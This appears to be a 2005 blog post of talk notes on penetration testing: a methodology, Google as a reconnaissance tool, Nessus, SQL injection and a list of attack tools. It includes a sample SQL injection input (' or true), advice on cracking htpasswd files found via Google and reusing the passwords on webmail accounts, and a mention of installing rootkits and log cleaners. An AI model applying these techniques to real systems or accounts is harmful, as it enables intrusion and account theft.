Note: This content is accessible to all versions of every browser. However, this browser may not support basic Web standards, preventing the display of our site's design details. We support the mission of the Web Standards Project in the campaign encouraging users to upgrade their browsers.
Thursday, August 04, 2005 13:39 // Portland, Oregon, US // href
The main problem with security scanners is that they produce a lot of false positives. If you work with a closed source tool there is no way for you to figure out where the false positives come from. With OSS tools these issues can be resolved easily.
Penetration Methodology
a) Discovery stage with whois, traceroute, google
b) Scanning to figure out which boxes exist
c) Service enumeration (service identification and banner grabbing) do not get confused by services running on the wrong port
d) Exploit known vulnerabilities if you can identify versions of services.
e) Install rootkits and log cleaning tools
Obviously only steps a) to c) are executed by security testing companies.
Google as Security tool
Google does not discriminate private information. Often you can find xsl and doc files in google which had not been put there intentionally.
Another great resource are Webserver directories without index files.
Error messages also get indexed by google. Especially php apps are very helpful in this respect, revealing lots of internal information like path and file names.
Webcams use standard file names, so if you search for these strings you can easily find lots of them.
If you find htpasswd files via google you can pull them, crack the passwords using john and then try password user name combinations on yahoo, google, hotmail. Since users often reuse user names and passwords, these things have a high probability of being successful.
The biggest advantage of google though, is that doing google queries is anonymous and will not be detected by the target.
For greater efficiency one could write a script that uses google webservice apis for automatically doing interesting queries in connection with a certain target.
Nessus
The coolest thing about nessus is that it is very easily extensible. It comes with its own optimized scripting language NASL. The advantage to writing NASL scripts as opposed to writing them in a random scripting language is that NASL scripts plug right into the comprehensive Nessus user interface.
SQL Injections for Web applications
Many web application have only rudimentary input validation.
$sql = " select * from users where user'$a' and password '$b' "
how about trying to login with
' or true
This would end up as
select * from users where user'ddd' and password '' or true;
The possibilities are limitless. By adding a '; you could even start a completely new command.
Absinthe from (0x90.org ...) is a tool that tries to automate these attacks.
Tools
Metasploit is a point click root tool (metasploit.com ...)
Wikto is an automated google enabled website vulnerability scanner (www.sensepost.com ...)
Ettercap Network MITM attacks, content filtering, sniffing, etc: (ettercap.sourceforge.net < ...)
Whax is live linux distro with lots of AampP tools (iwhax.net < ...)
Content © by Tobias Oetiker